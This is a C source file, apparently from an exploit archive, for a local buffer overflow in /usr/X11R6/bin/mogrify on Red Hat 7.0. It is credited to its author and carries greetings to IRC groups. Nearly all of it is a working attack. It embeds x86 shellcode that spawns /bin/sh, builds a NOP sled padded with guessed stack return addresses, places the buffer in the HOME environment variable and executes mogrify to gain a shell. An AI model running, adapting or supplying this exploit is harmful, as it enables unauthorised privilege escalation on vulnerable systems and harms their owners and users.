/usr/X11R6/bin/mogrify local buffer overflow exploit for Redhat 7.0.
3b8cfa09a9e36ebc44c23db2716680788f2f6f2f3d559d5ca6ce1e6da6db44ea
/*
/usr/X11R6/bin/mogrify (rh 7.0) exploit by Zucco (zucco@netposta.net)
Thx to: lez, [Cr0W], akos, slash, scrippie, sirc/#coders, EFnet/#hwa-security
*/
#include <stdlib.h>
#define OFFSET 0
#define LEN 1696
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char **argv) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=OFFSET, bsize=LEN;
int i;
if (argc > 1) offset = atoi(argv[1]);
if (!(buff = malloc(bsize))) {
printf("Memory suxx..\n");
exit(0);
}
addr = get_sp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
setenv("HOME",buff,1);
execlp("/usr/X11R6/bin/mogrify", "zzzzz",0);
}